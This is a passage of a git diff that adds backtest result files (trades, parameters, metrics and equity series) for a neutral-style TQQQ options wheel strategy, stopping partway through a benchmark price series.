[ + "2025-06-11", + 529.8452758789062 + ], + [ + "2025-06-12", + 531.0892944335938 + ], + [ + "2025-06-13", + 524.421630859375 + ], + [ + "2025-06-16", + 531.7162475585938 + ], + [ + "2025-06-17", + 526.5313720703125 + ], + [ + "2025-06-18", + 526.4418334960938 + ], + [ + "2025-06-20", + 524.2921752929688 + ], + [ + "2025-06-23", + 529.6832275390625 + ], + [ + "2025-06-24", + 537.7831420898438 + ], + [ + "2025-06-25", + 539.157958984375 + ], + [ + "2025-06-26", + 544.1992797851562 + ], + [ + "2025-06-27", + 546.0623779296875 + ], + [ + "2025-06-30", + 549.5992431640625 + ], + [ + "2025-07-01", + 544.9664306640625 + ], + [ + "2025-07-02", + 548.7623291015625 + ], + [ + "2025-07-03", + 554.1622314453125 + ], + [ + "2025-07-07", + 549.9878540039062 + ], + [ + "2025-07-08", + 550.2966918945312 + ], + [ + "2025-07-09", + 554.1921997070312 + ], + [ + "2025-07-10", + 553.3951416015625 + ], + [ + "2025-07-11", + 552.1497802734375 + ], + [ + "2025-07-14", + 554.1524047851562 + ], + [ + "2025-07-15", + 554.660400390625 + ], + [ + "2025-07-16", + 555.228271484375 + ], + [ + "2025-07-17", + 559.7216186523438 + ], + [ + "2025-07-18", + 559.1836547851562 + ], + [ + "2025-07-21", + 562.0828857421875 + ], + [ + "2025-07-22", + 559.1737060546875 + ], + [ + "2025-07-23", + 561.7242431640625 + ], + [ + "2025-07-24", + 562.9197387695312 + ], + [ + "2025-07-25", + 564.2747192382812 + ], + [ + "2025-07-28", + 566.0382080078125 + ], + [ + "2025-07-29", + 565.1614990234375 + ], + [ + "2025-07-30", + 565.9186401367188 + ], + [ + "2025-07-31", + 562.9197387695312 + ], + [ + "2025-08-01", + 551.8309936523438 + ], + [ + "2025-08-04", + 562.0131225585938 + ], + [ + "2025-08-05", + 558.1973266601562 + ], + [ + "2025-08-06", + 565.2212524414062 + ], + [ + "2025-08-07", + 567.1340942382812 + ], + [ + "2025-08-08", + 572.4244995117188 + ], + [ + "2025-08-11", + 570.7307739257812 + ], + [ + "2025-08-12", + 577.904052734375 + ], + [ + "2025-08-13", + 578.1930541992188 + ], + [ + "2025-08-14", + 577.7448120117188 + ], + [ + "2025-08-15", + 575.2041625976562 + ], + [ + "2025-08-18", + 574.9749755859375 + ], + [ + "2025-08-19", + 567.1739501953125 + ], + [ + "2025-08-20", + 563.8065185546875 + ], + [ + "2025-08-21", + 561.1962280273438 + ], + [ + "2025-08-22", + 569.85400390625 + ], + [ + "2025-08-25", + 568.2101440429688 + ], + [ + "2025-08-26", + 570.4916381835938 + ], + [ + "2025-08-27", + 571.3684692382812 + ], + [ + "2025-08-28", + 574.9451904296875 + ], + [ + "2025-08-29", + 568.2898559570312 + ], + [ + "2025-09-02", + 563.527587890625 + ], + [ + "2025-09-03", + 567.9610595703125 + ], + [ + "2025-09-04", + 573.1019897460938 + ], + [ + "2025-09-05", + 573.9288940429688 + ], + [ + "2025-09-08", + 576.728515625 + ], + [ + "2025-09-09", + 578.3624877929688 + ], + [ + "2025-09-10", + 578.5517578125 + ], + [ + "2025-09-11", + 581.919189453125 + ], + [ + "2025-09-12", + 584.4896240234375 + ], + [ + "2025-09-15", + 589.4910888671875 + ], + [ + "2025-09-16", + 588.9929809570312 + ], + [ + "2025-09-17", + 587.8173217773438 + ], + [ + "2025-09-18", + 593.11767578125 + ], + [ + "2025-09-19", + 597.1326904296875 + ], + [ + "2025-09-22", + 600.667724609375 + ], + [ + "2025-09-23", + 596.6779174804688 + ], + [ + "2025-09-24", + 594.583251953125 + ], + [ + "2025-09-25", + 592.0198364257812 + ], + [ + "2025-09-26", + 594.4535522460938 + ], + [ + "2025-09-29", + 597.20654296875 + ], + [ + "2025-09-30", + 598.8424072265625 + ], + [ + "2025-10-01", + 601.7150268554688 + ], + [ + "2025-10-02", + 604.188720703125 + ], + [ + "2025-10-03", + 601.645263671875 + ], + [ + "2025-10-06", + 606.1636962890625 + ], + [ + "2025-10-07", + 602.9718627929688 + ], + [ + "2025-10-08", + 609.88427734375 + ], + [ + "2025-10-09", + 609.1461181640625 + ], + [ + "2025-10-10", + 588.0000610351562 + ], + [ + "2025-10-13", + 600.4782104492188 + ], + [ + "2025-10-14", + 596.4783935546875 + ], + [ + "2025-10-15", + 600.6876220703125 + ], + [ + "2025-10-16", + 598.4633178710938 + ], + [ + "2025-10-17", + 602.393310546875 + ], + [ + "2025-10-20", + 609.98388671875 + ], + [ + "2025-10-21", + 609.8244018554688 + ], + [ + "2025-10-22", + 603.9493408203125 + ], + [ + "2025-10-23", + 609.0264282226562 + ], + [ + "2025-10-24", + 615.52978515625 + ], + [ + "2025-10-27", + 626.4918823242188 + ], + [ + "2025-10-28", + 631.3095703125 + ], + [ + "2025-10-29", + 634.15234375 + ], + [ + "2025-10-30", + 624.45703125 + ], + [ + "2025-10-31", + 627.4693603515625 + ], + [ + "2025-11-03", + 630.4716796875 + ], + [ + "2025-11-04", + 617.6743774414062 + ], + [ + "2025-11-05", + 621.6941528320312 + ], + [ + "2025-11-06", + 610.1136474609375 + ], + [ + "2025-11-07", + 608.1885375976562 + ], + [ + "2025-11-10", + 621.6442260742188 + ], + [ + "2025-11-11", + 619.9884643554688 + ], + [ + "2025-11-12", + 619.4996948242188 + ], + [ + "2025-11-13", + 606.8519897460938 + ], + [ + "2025-11-14", + 607.310791015625 + ], + [ + "2025-11-17", + 602.1240234375 + ], + [ + "2025-11-18", + 594.792724609375 + ], + [ + "2025-11-19", + 598.3436889648438 + ], + [ + "2025-11-20", + 584.1798095703125 + ], + [ + "2025-11-21", + 588.568603515625 + ], + [ + "2025-11-24", + 603.6201782226562 + ], + [ + "2025-11-25", + 607.3406982421875 + ], + [ + "2025-11-26", + 612.70703125 + ], + [ + "2025-11-28", + 617.6743774414062 + ], + [ + "2025-12-01", + 615.599609375 + ], + [ + "2025-12-02", + 620.4173583984375 + ], + [ + "2025-12-03", + 621.9335327148438 + ], + [ + "2025-12-04", + 621.35498046875 + ], + [ + "2025-12-05", + 623.8884887695312 + ], + [ + "2025-12-08", + 622.6915893554688 + ], + [ + "2025-12-09", + 623.4595947265625 + ], + [ + "2025-12-10", + 626.0130615234375 + ], + [ + "2025-12-11", + 623.98828125 + ], + [ + "2025-12-12", + 612.0587158203125 + ], + [ + "2025-12-15", + 608.9865112304688 + ], + [ + "2025-12-16", + 610.1934204101562 + ], + [ + "2025-12-17", + 598.8822631835938 + ], + [ + "2025-12-18", + 607.5601806640625 + ], + [ + "2025-12-19", + 615.4799194335938 + ], + [ + "2025-12-22", + 618.4302368164062 + ], + [ + "2025-12-23", + 621.3265380859375 + ], + [ + "2025-12-24", + 623.144287109375 + ], + [ + "2025-12-26", + 623.1043090820312 + ], + [ + "2025-12-29", + 620.088134765625 + ], + [ + "2025-12-30", + 618.64990234375 + ], + [ + "2025-12-31", + 613.536376953125 + ], + [ + "2026-01-02", + 612.347900390625 + ], + [ + "2026-01-05", + 617.2117309570312 + ], + [ + "2026-01-06", + 622.6348876953125 + ], + [ + "2026-01-07", + 623.2341918945312 + ], + [ + "2026-01-08", + 619.6885986328125 + ], + [ + "2026-01-09", + 625.86083984375 + ], + [ + "2026-01-12", + 626.3801879882812 + ], + [ + "2026-01-13", + 625.4513549804688 + ], + [ + "2026-01-14", + 618.769775390625 + ], + [ + "2026-01-15", + 620.9970092773438 + ], + [ + "2026-01-16", + 620.4776611328125 + ], + [ + "2026-01-20", + 607.2942504882812 + ], + [ + "2026-01-21", + 615.50390625 + ], + [ + "2026-01-22", + 619.978271484375 + ], + [ + "2026-01-23", + 621.935791015625 + ], + [ + "2026-01-26", + 624.67236328125 + ], + [ + "2026-01-27", + 630.335205078125 + ], + [ + "2026-01-28", + 632.4225463867188 + ], + [ + "2026-01-29", + 628.6373291015625 + ], + [ + "2026-01-30", + 621.0868530273438 + ], + [ + "2026-02-02", + 625.3515014648438 + ], + [ + "2026-02-03", + 615.7435913085938 + ], + [ + "2026-02-04", + 604.9871826171875 + ], + [ + "2026-02-05", + 596.2781982421875 + ], + [ + "2026-02-06", + 608.8822631835938 + ], + [ + "2026-02-09", + 613.54638671875 + ], + [ + "2026-02-10", + 610.699951171875 + ], + [ + "2026-02-11", + 612.337890625 + ], + [ + "2026-02-12", + 599.8836059570312 + ], + [ + "2026-02-13", + 601.1619873046875 + ], + [ + "2026-02-17", + 600.542724609375 + ], + [ + "2026-02-18", + 605.027099609375 + ], + [ + "2026-02-19", + 602.7100219726562 + ], + [ + "2026-02-20", + 608.0433349609375 + ], + [ + "2026-02-23", + 600.652587890625 + ], + [ + "2026-02-24", + 607.1044921875 + ], + [ + "2026-02-25", + 615.9033813476562 + ], + [ + "2026-02-26", + 608.4727783203125 + ], + [ + "2026-02-27", + 606.5252075195312 + ], + [ + "2026-03-02", + 607.32421875 + ], + [ + "2026-03-03", + 600.8224487304688 + ], + [ + "2026-03-04", + 609.9808959960938 + ], + [ + "2026-03-05", + 608.1431274414062 + ], + [ + "2026-03-06", + 598.9946899414062 + ], + [ + "2026-03-09", + 606.99462890625 + ], + [ + "2026-03-10", + 607.004638671875 + ], + [ + "2026-03-11", + 606.9247436523438 + ], + [ + "2026-03-12", + 596.5078735351562 + ], + [ + "2026-03-13", + 592.9722900390625 + ], + [ + "2026-03-16", + 599.6239013671875 + ], + [ + "2026-03-17", + 602.5502319335938 + ], + [ + "2026-03-18", + 594.15087890625 + ], + [ + "2026-03-19", + 592.273193359375 + ], + [ + "2026-03-20", + 581.3269653320312 + ], + [ + "2026-03-23", + 588.0 + ], + [ + "2026-03-24", + 583.97998046875 + ], + [ + "2026-03-25", + 587.8200073242188 + ], + [ + "2026-03-26", + 573.7899780273438 + ], + [ + "2026-03-27", + 562.5800170898438 + ], + [ + "2026-03-30", + 558.280029296875 + ], + [ + "2026-03-31", + 577.1799926757812 + ], + [ + "2026-04-01", + 584.3099975585938 + ], + [ + "2026-04-02", + 584.97998046875 + ], + [ + "2026-04-06", + 588.5 + ], + [ + "2026-04-07", + 588.5900268554688 + ], + [ + "2026-04-08", + 606.0900268554688 + ], + [ + "2026-04-09", + 610.1900024414062 + ], + [ + "2026-04-10", + 611.0700073242188 + ], + [ + "2026-04-13", + 617.3900146484375 + ], + [ + "2026-04-14", + 628.5999755859375 + ], + [ + "2026-04-15", + 637.4000244140625 + ], + [ + "2026-04-16", + 640.469970703125 + ], + [ + "2026-04-17", + 648.8499755859375 + ], + [ + "2026-04-20", + 646.7899780273438 + ], + [ + "2026-04-21", + 644.3300170898438 + ], + [ + "2026-04-22", + 655.1099853515625 + ], + [ + "2026-04-23", + 651.4199829101562 + ] + ] +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/trades.json b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/trades.json new file mode 100644 index 0000000..7f32739 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/trades.json @@ -0,0 +1,110 @@ +[ + { + "date": "2025-08-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 39.74, + "spot": 45.12633514404297, + "premium": 0.5536146925726833, + "close_cost": 0.24599471329293987, + "pnl": 24.781997927974338, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2025-10-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 44.03, + "spot": 51.44924545288086, + "premium": 0.796619024896291, + "close_cost": 0.3509533977764301, + "pnl": 38.58656271198609, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-11-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 48.48, + "spot": 56.17401885986328, + "premium": 1.778766330702327, + "close_cost": 0.48237271307612684, + "pnl": 123.65936176262001, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.91, + "spot": 53.34812545776367, + "premium": 1.036592731680047, + "close_cost": 0.46879731298197225, + "pnl": 50.79954186980747, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2026-01-06 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.56, + "spot": 54.91919708251953, + "premium": 0.5702405787526548, + "close_cost": 0.19268997243538966, + "pnl": 31.775060631726507, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2026-02-05 00:00:00", + "type": "PUT", + "action": "SL_Close", + "strike": 47.71, + "spot": 47.561363220214844, + "premium": 0.721505715176253, + "close_cost": 2.419175603087396, + "pnl": -175.74698879111432, + "hold_days": 2, + "result": "Loss" + }, + { + "date": "2026-03-05 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.23, + "spot": 49.717796325683594, + "premium": 1.061063730657704, + "close_cost": 0.5197564837331896, + "pnl": 48.15072469245143, + "hold_days": 9, + "result": "Win" + }, + { + "date": "2026-03-20 00:00:00", + "type": "PUT", + "action": "SL_Close", + "strike": 43.75, + "spot": 43.00889205932617, + "premium": 0.8460148560320633, + "close_cost": 2.6650036731767415, + "pnl": -187.8788817144678, + "hold_days": 3, + "result": "Loss" + }, + { + "date": "2026-04-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.18, + "spot": 48.959999084472656, + "premium": 1.4108038692109268, + "close_cost": 0.6567915748501205, + "pnl": 69.42122943608062, + "hold_days": 2, + "result": "Win" + } +] \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/drawdown.png b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/drawdown.png new file mode 100644 index 0000000..958ef2f Binary files /dev/null and b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/drawdown.png differ diff --git a/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/equity.png b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/equity.png new file mode 100644 index 0000000..465fba1 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/equity.png differ diff --git a/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/indicators.png b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/indicators.png new file mode 100644 index 0000000..d680555 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/indicators.png differ diff --git a/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/monthly.png b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/monthly.png new file mode 100644 index 0000000..edf4ffc Binary files /dev/null and b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/monthly.png differ diff --git a/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/meta.json b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/meta.json new file mode 100644 index 0000000..87738d8 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/meta.json @@ -0,0 +1,13 @@ +{ + "start": "2025-04-24", + "end": "2026-04-24", + "style": "neutral", + "underlying_ticker": "TQQQ", + "signal_ticker": "QQQ", + "put_otm_pct": 9.0, + "call_otm_pct": 6.0, + "put_tp_pct": 80.0, + "call_tp_pct": 50.0, + "put_sl_pct": 200.0, + "call_sl_pct": null +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/metrics.json b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/metrics.json new file mode 100644 index 0000000..e95b0e2 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/metrics.json @@ -0,0 +1,15 @@ +{ + "total_return": 5.328146325585448, + "final_value": 10532.814632558544, + "cagr": 5.34692422213614, + "sharpe": 0.5849740422340445, + "max_dd": -2.5196350839124597, + "n_trades": 9, + "wins": 7, + "losses": 2, + "win_rate": 77.77777777777779, + "avg_win": 84.73485015577744, + "avg_loss": -181.8129352527916, + "chain_quotes": 0, + "bs_quotes": 69 +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/series.json b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/series.json new file mode 100644 index 0000000..07acd6f --- /dev/null +++ b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/series.json @@ -0,0 +1,6088 @@ +{ + "equity": [ + [ + "2025-04-24", + 10001.173037138344 + ], + [ + "2025-04-25", + 10002.3462118783 + ], + [ + "2025-04-28", + 10003.519524236011 + ], + [ + "2025-04-29", + 10004.692974227619 + ], + [ + "2025-04-30", + 10005.866561869268 + ], + [ + "2025-05-01", + 10007.040287177108 + ], + [ + "2025-05-02", + 10008.214150167285 + ], + [ + "2025-05-05", + 10009.38815085595 + ], + [ + "2025-05-06", + 10010.562289259256 + ], + [ + "2025-05-07", + 10011.736565393358 + ], + [ + "2025-05-08", + 10012.910979274411 + ], + [ + "2025-05-09", + 10014.085530918574 + ], + [ + "2025-05-12", + 10015.260220342007 + ], + [ + "2025-05-13", + 10016.435047560872 + ], + [ + "2025-05-14", + 10017.610012591333 + ], + [ + "2025-05-15", + 10018.785115449555 + ], + [ + "2025-05-16", + 10019.960356151707 + ], + [ + "2025-05-19", + 10021.135734713958 + ], + [ + "2025-05-20", + 10022.31125115248 + ], + [ + "2025-05-21", + 10023.486905483445 + ], + [ + "2025-05-22", + 10024.66269772303 + ], + [ + "2025-05-23", + 10025.83862788741 + ], + [ + "2025-05-27", + 10027.014695992766 + ], + [ + "2025-05-28", + 10028.19090205528 + ], + [ + "2025-05-29", + 10029.367246091131 + ], + [ + "2025-05-30", + 10030.543728116507 + ], + [ + "2025-06-02", + 10031.720348147594 + ], + [ + "2025-06-03", + 10032.89710620058 + ], + [ + "2025-06-04", + 10034.074002291656 + ], + [ + "2025-06-05", + 10035.251036437016 + ], + [ + "2025-06-06", + 10036.428208652851 + ], + [ + "2025-06-09", + 10037.605518955359 + ], + [ + "2025-06-10", + 10038.782967360738 + ], + [ + "2025-06-11", + 10039.960553885187 + ], + [ + "2025-06-12", + 10041.138278544908 + ], + [ + "2025-06-13", + 10042.316141356107 + ], + [ + "2025-06-16", + 10043.494142334986 + ], + [ + "2025-06-17", + 10044.672281497757 + ], + [ + "2025-06-18", + 10045.850558860626 + ], + [ + "2025-06-20", + 10047.028974439807 + ], + [ + "2025-06-23", + 10048.20752825151 + ], + [ + "2025-06-24", + 10049.386220311953 + ], + [ + "2025-06-25", + 10050.565050637353 + ], + [ + "2025-06-26", + 10051.744019243928 + ], + [ + "2025-06-27", + 10052.923126147898 + ], + [ + "2025-06-30", + 10054.102371365487 + ], + [ + "2025-07-01", + 10055.28175491292 + ], + [ + "2025-07-02", + 10056.461276806422 + ], + [ + "2025-07-03", + 10057.640937062224 + ], + [ + "2025-07-07", + 10058.820735696554 + ], + [ + "2025-07-08", + 10060.000672725646 + ], + [ + "2025-07-09", + 10061.180748165734 + ], + [ + "2025-07-10", + 10062.360962033054 + ], + [ + "2025-07-11", + 10063.541314343844 + ], + [ + "2025-07-14", + 10064.721805114343 + ], + [ + "2025-07-15", + 10065.902434360793 + ], + [ + "2025-07-16", + 10067.083202099438 + ], + [ + "2025-07-17", + 10068.264108346526 + ], + [ + "2025-07-18", + 10069.4451531183 + ], + [ + "2025-07-21", + 10070.626336431013 + ], + [ + "2025-07-22", + 10071.807658300915 + ], + [ + "2025-07-23", + 10072.98911874426 + ], + [ + "2025-07-24", + 10074.170717777304 + ], + [ + "2025-07-25", + 10075.352455416301 + ], + [ + "2025-07-28", + 10076.534331677512 + ], + [ + "2025-07-29", + 10077.7163465772 + ], + [ + "2025-07-30", + 10078.898500131623 + ], + [ + "2025-07-31", + 10080.080792357048 + ], + [ + "2025-08-01", + 10081.263223269743 + ], + [ + "2025-08-04", + 10082.445792885976 + ], + [ + "2025-08-05", + 10083.628501222016 + ], + [ + "2025-08-06", + 10084.811348294137 + ], + [ + "2025-08-07", + 10085.994334118612 + ], + [ + "2025-08-08", + 10087.177458711718 + ], + [ + "2025-08-11", + 10088.360722089732 + ], + [ + "2025-08-12", + 10089.544124268934 + ], + [ + "2025-08-13", + 10090.727665265607 + ], + [ + "2025-08-14", + 10091.911345096036 + ], + [ + "2025-08-15", + 10093.095163776503 + ], + [ + "2025-08-18", + 10094.279121323298 + ], + [ + "2025-08-19", + 10095.463217752711 + ], + [ + "2025-08-20", + 10093.657453081032 + ], + [ + "2025-08-21", + 10085.143201777977 + ], + [ + "2025-08-22", + 10114.051335236374 + ], + [ + "2025-08-25", + 10119.239229812742 + ], + [ + "2025-08-26", + 10129.182457863533 + ], + [ + "2025-08-27", + 10135.0484675557 + ], + [ + "2025-08-28", + 10144.676766272769 + ], + [ + "2025-08-29", + 10141.247506755944 + ], + [ + "2025-09-02", + 10147.449630413497 + ], + [ + "2025-09-03", + 10153.25335576784 + ], + [ + "2025-09-04", + 10154.444370093974 + ], + [ + "2025-09-05", + 10155.635524130512 + ], + [ + "2025-09-08", + 10156.826817893842 + ], + [ + "2025-09-09", + 10158.018251400354 + ], + [ + "2025-09-10", + 10159.20982466644 + ], + [ + "2025-09-11", + 10160.401537708498 + ], + [ + "2025-09-12", + 10161.593390542921 + ], + [ + "2025-09-15", + 10162.785383186107 + ], + [ + "2025-09-16", + 10163.977515654457 + ], + [ + "2025-09-17", + 10165.169787964373 + ], + [ + "2025-09-18", + 10166.362200132258 + ], + [ + "2025-09-19", + 10167.55475217452 + ], + [ + "2025-09-22", + 10168.747444107565 + ], + [ + "2025-09-23", + 10169.940275947803 + ], + [ + "2025-09-24", + 10171.133247711647 + ], + [ + "2025-09-25", + 10172.326359415509 + ], + [ + "2025-09-26", + 10173.519611075804 + ], + [ + "2025-09-29", + 10174.713002708952 + ], + [ + "2025-09-30", + 10175.906534331369 + ], + [ + "2025-10-01", + 10177.100205959478 + ], + [ + "2025-10-02", + 10178.294017609702 + ], + [ + "2025-10-03", + 10179.487969298467 + ], + [ + "2025-10-06", + 10180.682061042198 + ], + [ + "2025-10-07", + 10181.876292857327 + ], + [ + "2025-10-08", + 10183.070664760282 + ], + [ + "2025-10-09", + 10184.265176767496 + ], + [ + "2025-10-10", + 10182.469828895404 + ], + [ + "2025-10-13", + 10228.240166750056 + ], + [ + "2025-10-14", + 10219.36324449755 + ], + [ + "2025-10-15", + 10235.122509912953 + ], + [ + "2025-10-16", + 10235.351785998953 + ], + [ + "2025-10-17", + 10248.229458323354 + ], + [ + "2025-10-20", + 10260.617194171848 + ], + [ + "2025-10-21", + 10261.820802674958 + ], + [ + "2025-10-22", + 10263.024552365816 + ], + [ + "2025-10-23", + 10264.228443260983 + ], + [ + "2025-10-24", + 10265.432475377023 + ], + [ + "2025-10-27", + 10266.636648730502 + ], + [ + "2025-10-28", + 10267.840963337987 + ], + [ + "2025-10-29", + 10269.045419216049 + ], + [ + "2025-10-30", + 10270.250016381257 + ], + [ + "2025-10-31", + 10271.454754850187 + ], + [ + "2025-11-03", + 10272.659634639413 + ], + [ + "2025-11-04", + 10273.864655765514 + ], + [ + "2025-11-05", + 10275.069818245067 + ], + [ + "2025-11-06", + 10273.285122094656 + ], + [ + "2025-11-07", + 10325.630723998629 + ], + [ + "2025-11-10", + 10405.37654784248 + ], + [ + "2025-11-11", + 10407.017299879857 + ], + [ + "2025-11-12", + 10412.066427537966 + ], + [ + "2025-11-13", + 10339.562365476979 + ], + [ + "2025-11-14", + 10351.078464913344 + ], + [ + "2025-11-17", + 10344.373086382493 + ], + [ + "2025-11-18", + 10283.834533977222 + ], + [ + "2025-11-19", + 10331.311527368998 + ], + [ + "2025-11-20", + 10149.720348869449 + ], + [ + "2025-11-21", + 10229.38447837577 + ], + [ + "2025-11-24", + 10420.250337012874 + ], + [ + "2025-11-25", + 10449.38699218413 + ], + [ + "2025-11-26", + 10450.612744085607 + ], + [ + "2025-11-28", + 10451.838639772333 + ], + [ + "2025-12-01", + 10453.064679261177 + ], + [ + "2025-12-02", + 10454.290862569005 + ], + [ + "2025-12-03", + 10455.51718971269 + ], + [ + "2025-12-04", + 10456.743660709102 + ], + [ + "2025-12-05", + 10457.970275575119 + ], + [ + "2025-12-08", + 10459.197034327613 + ], + [ + "2025-12-09", + 10460.423936983467 + ], + [ + "2025-12-10", + 10461.650983559557 + ], + [ + "2025-12-11", + 10462.878174072768 + ], + [ + "2025-12-12", + 10461.115508539984 + ], + [ + "2025-12-15", + 10458.658746025538 + ], + [ + "2025-12-16", + 10476.594534286094 + ], + [ + "2025-12-17", + 10385.761862785706 + ], + [ + "2025-12-18", + 10455.0366943836 + ], + [ + "2025-12-19", + 10524.092940898974 + ], + [ + "2025-12-22", + 10547.94251960011 + ], + [ + "2025-12-23", + 10563.634867315897 + ], + [ + "2025-12-24", + 10564.874020917425 + ], + [ + "2025-12-26", + 10566.11331987627 + ], + [ + "2025-12-29", + 10567.352764209489 + ], + [ + "2025-12-30", + 10568.59235393413 + ], + [ + "2025-12-31", + 10569.832089067248 + ], + [ + "2026-01-02", + 10568.081969625902 + ], + [ + "2026-01-05", + 10593.517540564366 + ], + [ + "2026-01-06", + 10608.329905254623 + ], + [ + "2026-01-07", + 10612.937077988932 + ], + [ + "2026-01-08", + 10608.605841530438 + ], + [ + "2026-01-09", + 10617.434889838096 + ], + [ + "2026-01-12", + 10618.68035438207 + ], + [ + "2026-01-13", + 10619.92596502366 + ], + [ + "2026-01-14", + 10621.171721780003 + ], + [ + "2026-01-15", + 10622.417624668242 + ], + [ + "2026-01-16", + 10623.663673705516 + ], + [ + "2026-01-20", + 10624.90986890897 + ], + [ + "2026-01-21", + 10626.156210295749 + ], + [ + "2026-01-22", + 10627.402697883 + ], + [ + "2026-01-23", + 10628.649331687877 + ], + [ + "2026-01-26", + 10629.896111727528 + ], + [ + "2026-01-27", + 10631.143038019109 + ], + [ + "2026-01-28", + 10632.390110579774 + ], + [ + "2026-01-29", + 10633.637329426681 + ], + [ + "2026-01-30", + 10634.884694576991 + ], + [ + "2026-02-02", + 10636.132206047867 + ], + [ + "2026-02-03", + 10634.389863856471 + ], + [ + "2026-02-04", + 10556.08279308744 + ], + [ + "2026-02-05", + 10464.144856299854 + ], + [ + "2026-02-06", + 10465.3723393536 + ], + [ + "2026-02-09", + 10466.599966395666 + ], + [ + "2026-02-10", + 10467.827737442944 + ], + [ + "2026-02-11", + 10469.055652512325 + ], + [ + "2026-02-12", + 10470.283711620705 + ], + [ + "2026-02-13", + 10471.511914784978 + ], + [ + "2026-02-17", + 10472.740262022044 + ], + [ + "2026-02-18", + 10473.968753348803 + ], + [ + "2026-02-19", + 10475.197388782157 + ], + [ + "2026-02-20", + 10476.42616833901 + ], + [ + "2026-02-23", + 10477.65509203627 + ], + [ + "2026-02-24", + 10475.894159890842 + ], + [ + "2026-02-25", + 10516.690374225265 + ], + [ + "2026-02-26", + 10485.78741830458 + ], + [ + "2026-02-27", + 10481.197190673398 + ], + [ + "2026-03-02", + 10508.306889287998 + ], + [ + "2026-03-03", + 10476.158861858788 + ], + [ + "2026-03-04", + 10530.784607221045 + ], + [ + "2026-03-05", + 10538.717098728095 + ], + [ + "2026-03-06", + 10493.41627463861 + ], + [ + "2026-03-09", + 10563.458234116055 + ], + [ + "2026-03-10", + 10571.625610365107 + ], + [ + "2026-03-11", + 10574.877088900368 + ], + [ + "2026-03-12", + 10576.117561256238 + ], + [ + "2026-03-13", + 10577.358179124123 + ], + [ + "2026-03-16", + 10578.598942521092 + ], + [ + "2026-03-17", + 10576.849851464214 + ], + [ + "2026-03-18", + 10521.163209140239 + ], + [ + "2026-03-19", + 10514.458753233155 + ], + [ + "2026-03-20", + 10395.713293386932 + ], + [ + "2026-03-23", + 10396.932749164205 + ], + [ + "2026-03-24", + 10398.152347988169 + ], + [ + "2026-03-25", + 10399.372089875604 + ], + [ + "2026-03-26", + 10400.591974843292 + ], + [ + "2026-03-27", + 10401.812002908018 + ], + [ + "2026-03-30", + 10403.032174086567 + ], + [ + "2026-03-31", + 10404.252488395727 + ], + [ + "2026-04-01", + 10405.472945852287 + ], + [ + "2026-04-02", + 10406.69354647304 + ], + [ + "2026-04-06", + 10407.914290274777 + ], + [ + "2026-04-07", + 10406.145177274297 + ], + [ + "2026-04-08", + 10464.877310314123 + ], + [ + "2026-04-09", + 10484.02100930056 + ], + [ + "2026-04-10", + 10499.260485159362 + ], + [ + "2026-04-13", + 10522.935541927034 + ], + [ + "2026-04-14", + 10524.169921346544 + ], + [ + "2026-04-15", + 10525.404445563343 + ], + [ + "2026-04-16", + 10526.639114594418 + ], + [ + "2026-04-17", + 10527.873928456755 + ], + [ + "2026-04-20", + 10529.108887167344 + ], + [ + "2026-04-21", + 10530.343990743177 + ], + [ + "2026-04-22", + 10531.579239201244 + ], + [ + "2026-04-23", + 10532.814632558544 + ] + ], + "benchmark_bh": [ + [ + "2025-04-24", + 10000.0 + ], + [ + "2025-04-25", + 10111.479686660843 + ], + [ + "2025-04-28", + 10108.270443831525 + ], + [ + "2025-04-29", + 10175.02938743881 + ], + [ + "2025-04-30", + 10173.745296615465 + ], + [ + "2025-05-01", + 10306.622122647406 + ], + [ + "2025-05-02", + 10459.611997227099 + ], + [ + "2025-05-05", + 10397.560949203611 + ], + [ + "2025-05-06", + 10300.845354324096 + ], + [ + "2025-05-07", + 10341.285357198045 + ], + [ + "2025-05-08", + 10448.058460580478 + ], + [ + "2025-05-09", + 10441.211507212267 + ], + [ + "2025-05-12", + 10866.588081445609 + ], + [ + "2025-05-13", + 11032.203646174908 + ], + [ + "2025-05-14", + 11098.320216294174 + ], + [ + "2025-05-15", + 11110.516782581508 + ], + [ + 